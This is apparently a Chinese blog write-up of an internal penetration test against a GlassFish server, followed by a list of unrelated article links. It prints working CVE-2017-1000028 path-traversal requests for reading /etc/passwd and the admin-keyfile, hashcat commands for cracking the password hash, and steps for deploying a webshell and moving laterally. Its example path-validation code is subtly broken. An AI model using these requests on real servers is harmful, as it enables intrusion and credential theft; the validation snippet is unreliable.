当前位置：首页 > article >正文

从一次内部攻防演练说起：我是如何利用CVE-2017-1000028漏洞“捡到”GlassFish管理员密码的

article 2026/4/24 15:40:21

实战复盘GlassFish任意文件读取漏洞的深度利用链那是一个普通的周二下午我正在为客户做内部网络的安全评估。按照惯例我先用Nmap对目标网段进行扫描突然在扫描结果中发现了一台开放4848端口的服务器——这个端口号让我瞬间警觉起来因为4848正是GlassFish应用服务器的默认管理端口。1. 目标识别与初步侦察GlassFish作为一款开源的Java EE应用服务器在企业内部环境中并不罕见。但将管理界面直接暴露在内部网络中往往意味着潜在的安全风险。我决定先对目标进行指纹识别curl -I http://target-ip:4848返回的响应头中清晰地显示了服务器信息Server: GlassFish Server Open Source Edition 4.1.2 X-Powered-By: Servlet/3.1 JSP/2.3这个版本号立即让我联想到CVE-2017-1000028漏洞——一个经典的任意文件读取漏洞。为了确认漏洞存在的可能性我快速查阅了漏洞影响范围漏洞编号影响版本漏洞类型CVE-2017-1000028GlassFish ≤4.1.2任意文件读取2. 漏洞原理深度解析这个漏洞的本质是Java对UTF-8编码的特殊处理机制。正常情况下URL中的路径分隔符应该是正斜杠(/)但Java会错误地将特定编码序列解析为路径遍历字符%c0%af→\uC0AF→/(正斜杠)%c0%ae→\uC0AE→.(点)这种编码转换的深层原因在于Java的UTF-8解码器实现。当遇到%c0%af这样的双字节序列时二进制表示为11000000 10101111去除UTF-8前缀110后得到00000 101111转换为十进制47对应ASCII码中的正斜杠利用这个特性我们可以构造特殊的URL路径实现目录穿越http://target:4848/theme/META-INF/..%c0%af..%c0%af..%c0%afetc/passwd3. 漏洞利用实战过程3.1 初始探测我先尝试读取系统的基础文件确认漏洞存在GET /theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd HTTP/1.1 Host: target-ip:4848当看到返回的/etc/passwd文件内容时我知道这个系统确实存在漏洞。但作为安全评估我需要获取更有价值的信息。3.2 关键文件定位GlassFish的管理密码存储在特定位置glassfish/domains/domain1/config/admin-keyfile我构造了如下请求来获取这个关键文件GET /theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile HTTP/1.1 Host: target-ip:4848返回的文件内容格式如下admin;{SSHA256}DqA5sL7QJ8gV2Np1XwYz9xKbRtHjMlP3OiUvEeWc...3.3 密码破解策略GlassFish使用SSHA256算法存储密码哈希这是一种加盐的SHA-256哈希。我采用了以下步骤进行破解使用hashcat识别哈希类型hashid -m DqA5sL7QJ8gV2Np1XwYz9xKbRtHjMlP3OiUvEeWc...准备破解命令hashcat -m 1410 -a 3 hash.txt ?a?a?a?a?a?a最终在8小时后成功破解出明文密码提示在实际评估中建议使用更强大的字典或组合规则来加速破解过程4. 后渗透与风险扩大获取管理员凭证后登录管理界面(http://target-ip:4848)只是第一步。真正的风险在于后续的攻击链应用部署通过上传恶意WAR包获取Webshell数据访问查看部署的应用配置和数据库连接信息横向移动利用服务器作为跳板访问内部其他系统下表展示了GlassFish管理界面常见的高风险功能功能模块潜在风险安全建议Applications恶意应用部署严格审核部署包Resources数据库凭证泄露加密存储配置Configurations系统设置篡改定期审计配置5. 防御措施与最佳实践基于这次评估经验我总结了以下防护建议版本升级立即升级到GlassFish 4.1.2以上版本网络隔离管理界面不应直接暴露在网络中密码策略强制使用复杂密码并定期更换日志监控密切监控异常文件访问行为对于开发团队我建议在代码层面增加以下防护// 示例安全的路径校验方法 public static boolean isValidPath(String path) { return path.matches(^[a-zA-Z0-9_\\-./]$) !path.contains(..); }这次评估最让我印象深刻的是一个看似简单的文件读取漏洞配合弱密码策略最终可能导致整个系统沦陷。安全防御需要层层设防任何一个环节的疏忽都可能成为攻击者的突破口。

从一次内部攻防演练说起：我是如何利用CVE-2017-1000028漏洞“捡到”GlassFish管理员密码的

相关文章：

从一次内部攻防演练说起：我是如何利用CVE-2017-1000028漏洞“捡到”GlassFish管理员密码的

你的MCP4725 DAC输出不准？可能是这3个硬件坑和2个软件误区（附STM32 F4实测排查指南）

Python实战：用PyCryptodome构建你的数据安全防线

96个公共Tracker终极配置指南：让BT下载速度提升300%

3步解锁加密音乐：浏览器本地解密完全指南

用STM32G431玩超级玛丽！CubeMX+HAL库移植NES模拟器保姆级教程（附蓝桥杯板子适配）

RWKV-7 (1.5B World)镜像部署：腾讯云TI-ONE平台GPU容器配置

协同过滤算法原理与商业化应用实践

避坑指南：为什么ESP32的One-Wire驱动读不了AM2302？手把手教你用MicroPython中断搞定它

如何用NVIDIA Profile Inspector解锁显卡隐藏性能：完整新手教程

GPU加速多智能体强化学习在高频交易中的应用

避坑指南：瑞萨FSP中GPT的PWM模式到底怎么选？锯齿波、三角波1/2/3区别全解析

Hugging Face Transformer库实战：从入门到生产部署

三菱FX3U PLC编程避坑指南：加减乘除指令用错，小心数据寄存器不够用！

Vue2.0 + ElementUI登录页开发避坑指南：我踩过的5个坑（路由守卫、样式冲突、表单验证）

从桌游到代码：用Python模拟《展翅翱翔》AI对手，手把手教你实现策略算法

如何实现i茅台自动预约：Java Spring Boot实战部署与优化指南

Visual Syslog Server：Windows环境下的3分钟专业日志监控方案

核心代码编程-文档特征提取-100分

别再只让ChatGPT写诗了！用这5个真实开发场景，让它成为你的编程副驾

用Silvaco调参实战：如何精准控制NMOS的阈值电压Vt？从工艺注入到器件仿真的完整分析

音频变压器核心技术解析：噪声隔离、阻抗匹配与信号平衡转换

5个步骤掌握Happy Island Designer：从新手到岛屿设计大师的终极指南

Minecraft光影革命：Photon Shader从入门到精通的完整指南

Realsense D435i多相机标定后，如何用Kalibr结果文件（camchain.yaml）做实际应用？

PyTorch实现单层神经网络：从原理到实践

RTK定位中的RTCM3.2：GPS、BDS、Galileo多系统MSM电文（1074/1124等）配置与避坑指南

WinSpy++深度解析：5个实战技巧助你高效调试Windows窗口界面

别再硬啃BladeX源码了！从它的starter包结构，我总结了一套企业级微服务技术选型清单

Python实现办公自动化的数据可视化与报表生成